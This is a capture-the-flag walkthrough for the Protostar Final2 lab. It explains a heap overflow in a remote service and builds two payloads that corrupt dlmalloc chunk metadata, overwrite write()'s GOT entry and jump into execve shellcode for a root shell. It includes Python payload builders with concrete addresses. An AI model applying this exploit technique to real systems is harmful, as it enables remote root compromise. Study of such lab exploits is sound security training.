This is an explanation of Protostar level Final2. I wrote a solution in April without an explanation. I read it last night and had to spend half a day to understand it again. So next time I’ll write the explanation while it’s still fresh in my head.
The level’s description is
Remote heap level :)
Core files will be in /tmp.
This level is at /opt/protostar/bin/final2
This is the source code.
Overview of source code
The first line of the description coupled with the fact the code listens on port 2993 means we’ll
have to send a TCP packet that exploits a heap related vulnerability.
main() is pretty simple. It runs the final2 binary in the background as root and processes requests with
get_requests().
get_requests() declares an array of 256 char pointers and reads input strings into it. If any
request size isn’t REQSZ (128 bytes), the function breaks out of the while(1) loop. Any request
payload that doesn’t start with FSRD also breaks out of the loop. The check_path() function is
then called and dll is incremented. A for-loop writes “Process OK” to stdout and frees each string
buffer starting with the oldest.
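The two checks that keep get_requests() inside its loop can be modeled in a few lines of Python. This is only a sketch of the conditions described above, not the level's C code, and the function name accepts is made up for illustration.

```python
REQSZ = 128  # request size the level expects, per the text above


def accepts(request: bytes) -> bool:
    """Model of the two checks that keep get_requests() in its while(1) loop."""
    return len(request) == REQSZ and request.startswith(b"FSRD")


print(accepts(b"FSRD".ljust(REQSZ, b"A")))  # True: right size, right prefix
print(accepts(b"FSRDshort"))                # False: shorter than REQSZ
print(accepts(b"ABCD".ljust(REQSZ, b"A")))  # False: does not start with FSRD
```

Every payload in the rest of this post therefore has to be padded to exactly 128 bytes.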
check_path() stores a pointer to the last / in buf in p. l is the length of the string
starting at p. If p is non-null, start points to the part of buf that has "ROOT". If
"ROOT" is a substring in buf, the while loop decrements start until it finds a /. Then
memmove() copies l bytes of the string starting at p to start.
A TCP packet with the string FSRD/ROOT/AAAA will cause p to point to the second /. Treating
p as a string gives /AAAA, so l is 5. start initially points to the R in ROOT and later is
decremented to point to the first /. memmove() changes the string to FSRD/AAAA/AAAA.
The bug is that start-- doesn’t check the bounds of the string passed in by buf. It will keep
scanning leftward until it finds some / character, so memmove() can write to memory outside of
the current buffer.
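To make the leftward scan concrete, here is a rough Python model of check_path() working on a bytearray that stands in for process memory. It is a sketch under assumptions: the strings are scaled down rather than 128 bytes long, the 8 metadata bytes are illustrative, and the model returns early on a missing / instead of crashing like C would.

```python
def check_path(mem: bytearray, buf: int) -> None:
    """Rough model of check_path(); buf is the index in mem where the string starts."""
    end = mem.index(0, buf)              # a C string ends at the first NUL byte
    p = mem.rfind(b"/", buf, end)        # last '/' in the string
    if p == -1:
        return
    l = end - p                          # length of the string starting at p
    start = mem.find(b"ROOT", buf, end)  # first "ROOT" in the string
    if start == -1:
        return
    while mem[start] != ord("/"):        # no lower bound check: this is the bug
        start -= 1
    mem[start:start + l] = mem[p:p + l]  # copy l bytes from p to start


# Example from the text: the scan stays inside the string.
one = bytearray(b"FSRD/ROOT/AAAA\x00")
check_path(one, 0)
print(bytes(one))  # b'FSRD/AAAA/AAAA\x00'

# Scaled-down heap: first string, 8 bytes of chunk metadata, second string.
first = b"FSRDAAAA/AAAA"
meta = b"\x00\x00\x00\x00\x89\x00\x00\x00"
heap = bytearray(first + meta + b"FSRDROOTAAAA/BBBB\x00")
check_path(heap, len(first) + len(meta))
print(bytes(heap[:len(first)]))  # b'FSRDAAAA/BBBB'
```

In the second example the scan walks out of the second string, across the metadata, and stops at the / inside the first string, so the copy lands in the previous buffer.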
General Exploit Strategy
We know we’ll need to exploit the
free() call which in this series of exercises uses the
unlink() macro. In a previous post, I showed how this exploit
manipulates heap memory to redirect code execution. We’ll need to inject shellcode via the request
payloads. Our request payloads also need to corrupt heap memory in a way that will trick dlmalloc
into redirecting code to the shellcode.
Let’s craft a first payload that will allow the second payload to overwrite heap memory before the
start of the second string.
FSRDAAAA...AAAA/AAAA should work. The second payload can be
FSRDROOTAAA...AAAA/BBBB. After the second call to
check_path(), the heap memory of the first
string should be
FSRDAAAA...AAAA/BBBB. Let’s confirm this with a Python script and
set a breakpoint right after the call to
check_path() and send these two strings.
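A minimal sketch of how these two test requests could be built and sent. The helper names pad_between and send_requests are made up for illustration, and 0x804e008 is the address gdb reports for the first buffer later in this post.

```python
import socket

REQSZ = 128            # every request must be exactly this long
FIRST_BUF = 0x804e008  # address of the first string, as seen in gdb


def pad_between(prefix: bytes, suffix: bytes, fill: bytes = b"A") -> bytes:
    """Return prefix + filler + suffix, padded to exactly REQSZ bytes."""
    filler_len = REQSZ - len(prefix) - len(suffix)
    if filler_len < 0:
        raise ValueError("prefix and suffix do not fit in one request")
    return prefix + fill * filler_len + suffix


first = pad_between(b"FSRD", b"/AAAA")
second = pad_between(b"FSRDROOT", b"/BBBB")

# The second request should overwrite the bytes right after this slash.
overwrite_addr = FIRST_BUF + first.rindex(b"/") + 1
print(hex(overwrite_addr))  # 0x804e084


def send_requests(host, port, requests):
    """Send each request over one TCP connection (hypothetical helper)."""
    with socket.create_connection((host, port)) as conn:
        for request in requests:
            conn.sendall(request)
```

With the VM address used in this post, the call would be send_requests("192.168.99.107", 2993, [first, second]).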
We save the following contents to a file named
I’m running the Protostar VM on Virtualbox on a Macbook. Set the network settings for the VM to
Host-only Adapter. Once the VM starts, use the Virtualbox “Show” button to get a terminal to the VM.
Log in as user with password user. Run ip addr show to find the VM’s local IP address. Mine is
192.168.99.107. I then close the Virtualbox terminal because I like to use iTerm. I SSH with iTerm
into the VM as root with password godmode. We need to be root in order to attach gdb to the running
final2 process.
You can see final2 is already running. We get the PID.
Now attach gdb to it. Since the program forks a new child process to handle requests, we
set follow-fork-mode child to make gdb follow the child process instead of the parent.
set detach-on-fork off makes gdb hold control of both parent and child (I’m not sure if this is necessary). The other two gdb settings are my personal preferences.
Disassemble get_requests() to find where check_path() is called.
Now run our Python script in another terminal to send the strings.
Our gdb terminal will show the following.
Print buf to show the address it points to. Then examine the first 40 DWORDs in hexadecimal
starting at address 0x804e008 - 0x8 (we subtract 8 so we can see the first heap chunk’s metadata in
the previous 8 bytes). We can see its payload start with FSRD (0x44525346 as a little-endian DWORD)
followed by lots of As.
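If the byte order in the dump looks backwards, a quick check with Python's struct module shows how the DWORDs map to the characters we sent. This is only a sanity check, assuming the usual little-endian x86 layout.

```python
import struct

# gdb prints each DWORD as a number, so the bytes appear in reverse order.
magic = struct.pack("<I", 0x44525346)
print(magic)  # b'FSRD'

# Four filler bytes of "A" show up as this DWORD in the dump.
filler = struct.unpack("<I", b"AAAA")[0]
print(hex(filler))  # 0x41414141
```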
We continue and examine the memory of the first chunk again. We expect the memory at address
0x804e084 to be
0x42424242 which it is.
With the ability to overwrite bytes following a strategically placed
/ character in the previous
heap chunk, we can perform a classic heap overflow exploit using the
unlink() technique. We can’t
overwrite the first chunk’s heap metadata because there’s no way to insert a
/ before it. So we
target the second chunk’s heap metadata. I’m now going to rehash some of the dlmalloc algorithm
explained in my previous post because it can be a little confusing.
When the first chunk is freed, unlink() will run on the second chunk if the second chunk has
already been freed. dlmalloc determines if the second chunk is freed by checking the third chunk’s
PREV_INUSE bit, which is the lowest bit of the chunk’s second DWORD (its size field). In order to
find the start of the third chunk, dlmalloc adds the value of the second chunk’s second DWORD
bitmasked with ~0x1 (i.e. ignoring the lowest bit) to the second chunk’s starting address. So in
the above memory dump, the start of the second chunk is
(0x00000089 & ~0x1) + 0x804e000 = 0x804e088. Likewise, the start of the third chunk is
(0x00000089 & ~0x1) + 0x804e088 = 0x804e110. So we have to figure out a way to write
arbitrary bytes to the third chunk.
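The chunk arithmetic can be checked with a short Python sketch. It only masks the lowest bit, as described above; the real allocator may mask further flag bits, which makes no difference for these values. The function name next_chunk is made up for illustration.

```python
PREV_INUSE = 0x1
MASK32 = 0xFFFFFFFF  # pointers are 32 bits wide on this VM


def next_chunk(addr: int, size_field: int) -> int:
    """Start of the following chunk: address plus size with the flag bit cleared."""
    return (addr + (size_field & ~PREV_INUSE)) & MASK32


second = next_chunk(0x804e000, 0x00000089)
third = next_chunk(second, 0x00000089)
print(hex(second))  # 0x804e088
print(hex(third))   # 0x804e110
```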
But we’re already writing arbitrary bytes to the second chunk’s metadata. Is there a way to make
dlmalloc think the third chunk starts somewhere in memory where we’re already writing bytes for the
second chunk? Nothing in dlmalloc checks that the third chunk is actually right after the second.
dlmalloc just blindly performs an addition on two numbers. One of these numbers is the second
chunk’s size, which we can set via the memmove() bug. Let’s make dlmalloc think the third chunk is
actually four bytes before the start of the second chunk. The second chunk is at 0x804e088 so the
“virtual” third chunk will be at 0x804e084. What number added to 0x804e088 gives 0x804e084?
-4. Integer overflow means adding 0xfffffffc is the same as adding -4
(0x804e088 + 0xfffffffc = 0x804e084 in 32-bit arithmetic). So the second chunk’s second DWORD
representing its size must be 0xfffffffc, and the PREV_INUSE bit of the third chunk must be 0.
That bit lives in the virtual third chunk’s second DWORD at 0x804e088, which is also the second
chunk’s first DWORD, so writing 0xfffffffc 0xfffffffc starting at 0x804e088 will work.
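The wraparound is easy to verify in Python by masking every result to 32 bits. This is a sketch of the arithmetic only; the variable names are made up.

```python
MASK32 = 0xFFFFFFFF

second_chunk = 0x804e088
fake_size = -4 & MASK32  # -4 as an unsigned 32-bit value
print(hex(fake_size))    # 0xfffffffc

# Where dlmalloc believes the third chunk starts.
virtual_third = (second_chunk + fake_size) & MASK32
print(hex(virtual_third))  # 0x804e084

# The virtual third chunk's size field sits 4 bytes in, on top of the
# second chunk's first DWORD, and its lowest bit must be 0.
size_field_addr = virtual_third + 4
prev_inuse = 0xfffffffc & 0x1
print(hex(size_field_addr), prev_inuse)  # 0x804e088 0
```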
Once we fool dlmalloc into thinking the second chunk is already freed, dlmalloc will run unlink() on it.
So we need to craft values for the second chunk’s forwards and backwards pointers such that
unlink() will redirect code execution to another region of memory where we can insert shellcode.
In the Heap3 level we overwrote the address that a procedure linkage table (PLT) stub jumps to with
the address of shellcode. We can do the same here. Since we send two packets, dll will be 2. The
for-loop will call write() twice. The first free() will overwrite write()’s address in the global
offset table (GOT), so the second write() call jumps to our shellcode. Let’s find the PLT stub for
write(). Then examine the address 0x8048dfc as an instruction to get the address in the GOT that
holds the location of the actual write() function in the dynamically linked library. We
want to overwrite the contents of 0x804d41c with the address of our shellcode. Since unlink()
adds 12 to the forwards pointer, we need to make the forward pointer 0x804d41c - 12.
Crafting Malicious Packets
Where should we put our shellcode? We can include it in our first request. The first two DWORDs will
be clobbered by dlmalloc when it sets the first chunk’s forwards and backwards pointers. The first
word needs to be used for
FSRD anyways. So let’s put shellcode at
0x804e010. This address will
be our backwards pointer.
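The effect of unlink() with these two pointers can be simulated with a dictionary standing in for memory. This is a simplified model of the macro's two writes on a 32-bit chunk layout, not dlmalloc's actual code.

```python
def unlink(mem: dict, chunk: int) -> None:
    """Model of unlink(): two pointer writes driven by the chunk's fd and bk."""
    fd = mem[chunk + 8]   # forward pointer, third DWORD of the chunk
    bk = mem[chunk + 12]  # backward pointer, fourth DWORD of the chunk
    mem[fd + 12] = bk     # FD->bk = BK
    mem[bk + 8] = fd      # BK->fd = FD


GOT_WRITE = 0x804d41c     # GOT entry for write()
SHELLCODE = 0x804e010     # where our shellcode will live
SECOND_CHUNK = 0x804e088

mem = {SECOND_CHUNK + 8: GOT_WRITE - 12, SECOND_CHUNK + 12: SHELLCODE}
unlink(mem, SECOND_CHUNK)
print(hex(mem[GOT_WRITE]))      # 0x804e010
print(hex(mem[SHELLCODE + 8]))  # 0x804d410
```

The first write is the one we want. The second write is a side effect: it puts four bytes at 0x804e018, eight bytes into the shellcode area.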
To summarize, this is how the packets should look so far.
The first payload must start with FSRD. Then we need four filler bytes AAAA followed by
shellcode (TBD). The last byte must be / so the leftward scan stops there and memmove() writes
from that point on. The payload must be 128 bytes. The
spaces in the payload visualization below are just for readability. They shouldn’t be in the actual
payload.
The second payload must start with FSRDROOT. Then have a / followed by
0xfffffffc 0xfffffffc. Then the forward pointer 0x804d41c - 12 and backward pointer
0x804e010. The whole payload must again be 128 bytes. We can just fill the rest with filler bytes.
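A sketch of how the two payloads could be assembled with struct.pack. Placing the filler between FSRDROOT and the trailing / block is my assumption, as are the function names. Any layout works as long as the last / in the second payload is directly followed by the four DWORDs.

```python
import struct

REQSZ = 128
GOT_WRITE = 0x804d41c       # GOT entry for write()
SHELLCODE_ADDR = 0x804e010  # 8 bytes into the first string at 0x804e008


def first_payload(code: bytes) -> bytes:
    """FSRD + AAAA + code, padded with filler, ending in the '/' the scan will find."""
    body = b"FSRD" + b"AAAA" + code
    if len(body) > REQSZ - 1:
        raise ValueError("code is too long for one request")
    return body.ljust(REQSZ - 1, b"A") + b"/"


def second_payload() -> bytes:
    """FSRDROOT + filler + '/' + fake sizes + forward and backward pointers."""
    tail = b"/" + struct.pack("<IIII", 0xfffffffc, 0xfffffffc,
                              GOT_WRITE - 12, SHELLCODE_ADDR)
    return b"FSRDROOT".ljust(REQSZ - len(tail), b"A") + tail


p1 = first_payload(b"\xcc" * 4)  # placeholder code for now
p2 = second_payload()
print(len(p1), len(p2))  # 128 128
```

The code passed to first_payload() starts at offset 8, which is what puts it at 0x804e010.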
Before we craft shellcode, let’s confirm the exploit will redirect code execution to the proposed
shellcode address. Instead of using actual shellcode, we’ll use four bytes of
0xcc which is a
one-byte x86 instruction called
INT3 that causes the processor to halt the process for any
attached debuggers. If we hit this opcode, our attached gdb debugger will receive a SIGTRAP signal.
Let’s test with the below Python script.
Attach gdb to the
final2 process again.
Set a breakpoint at the call to free().
Run the Python script in another terminal. Hit enter to send a third packet that’s less than 128
bytes to break out of the while(1) loop.
The gdb session should hit the breakpoint.
Examine the first 80 DWORDs. Continue and examine again.
The DWORDs at 0x804e008 and 0x804e00c have been changed to addresses before the heap (I guess
because it’s some special value for the first chunk). Our INT3 instruction is at 0x804e010. Let’s
look at the GOT entry for write().
Its value is the location of our INT3. This means the next call to
write() will redirect code
execution to our INT3 which should cause gdb to break again.
Crafting the Shellcode
So now all we have to do is insert some real shellcode that’ll own the system. Since final2 is running
as root, let’s make the process start a shell. This will allow us to send arbitrary commands over TCP
that get executed as root, i.e. remote code execution. Shellstorm has a great library of
shellcodes. Let’s use “Linux/x86 - execve(/bin/sh) - 28 bytes”. But we have a problem.
unlink() overwrites the memory at 0x804e018 (it’ll always overwrite four bytes of
memory eight bytes ahead of whatever address we pick), and no useful shellcode is short enough to
fit into eight bytes. What can we do?
If only the shellcode could jump past the clobbered bytes to 0x804e01c, where we have a huge piece of
contiguous memory. Luckily the jmp instruction (\xeb) does exactly this. Its argument is how many
bytes to jump over. So our shellcode can start with 0xeb 0x0a which moves the instruction pointer
10 bytes forward. We fill in the middle 10 bytes with NOPs (0x90). Our final script puts these
pieces together.
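The jump stub and its landing address can be checked with a few lines of Python. This sketch only builds the 12-byte prefix; the function name with_jump_stub is made up and the real shellcode bytes are left as a parameter.

```python
SHELLCODE_ADDR = 0x804e010
CLOBBERED = range(0x804e018, 0x804e01c)  # the four bytes unlink() overwrites


def with_jump_stub(code: bytes) -> bytes:
    """Prefix code with a short jmp that skips 10 filler bytes."""
    return b"\xeb\x0a" + b"\x90" * 10 + code


# The jump distance counts from the end of the 2-byte jmp instruction.
landing = SHELLCODE_ADDR + 2 + 0x0a
print(hex(landing))          # 0x804e01c
print(landing in CLOBBERED)  # False: we land just past the overwritten bytes

stub = with_jump_stub(b"\xcc")  # INT3 stands in for the real shellcode here
print(len(stub) - 1)            # 12 bytes of prefix before the code
```

The clobbered DWORD falls inside the 10 NOP bytes, which are never executed because the jmp skips them.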